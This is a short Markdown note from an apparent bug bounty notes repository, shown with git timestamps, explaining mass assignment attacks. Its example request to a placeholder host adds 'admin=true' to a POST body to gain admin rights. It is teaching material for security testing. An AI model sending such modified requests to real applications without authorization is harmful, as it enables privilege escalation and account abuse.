AllAboutBugBounty/Misc/Mass Assignment.md

37 lines
695 B
Markdown
Raw Normal View History

2021-02-09 10:29:07 +00:00
# Mass Assignment Attack
2022-06-15 10:38:42 +00:00
2021-02-09 10:29:07 +00:00
## Introduction
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
2022-06-15 10:38:42 +00:00
## How to exploit
2021-02-09 10:29:07 +00:00
- Normal request
```
POST /editdata
Host: vuln.com
username=daffa
```
```
HTTP/1.1 200 OK
...
username=daffa&admin=false
```
- Modified Request
```
POST /editdata
Host: vuln.com
username=daffa&admin=true
```
```
HTTP/1.1 200 OK
...
username=daffa&admin=true
2022-06-15 10:38:42 +00:00
```
## References
* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)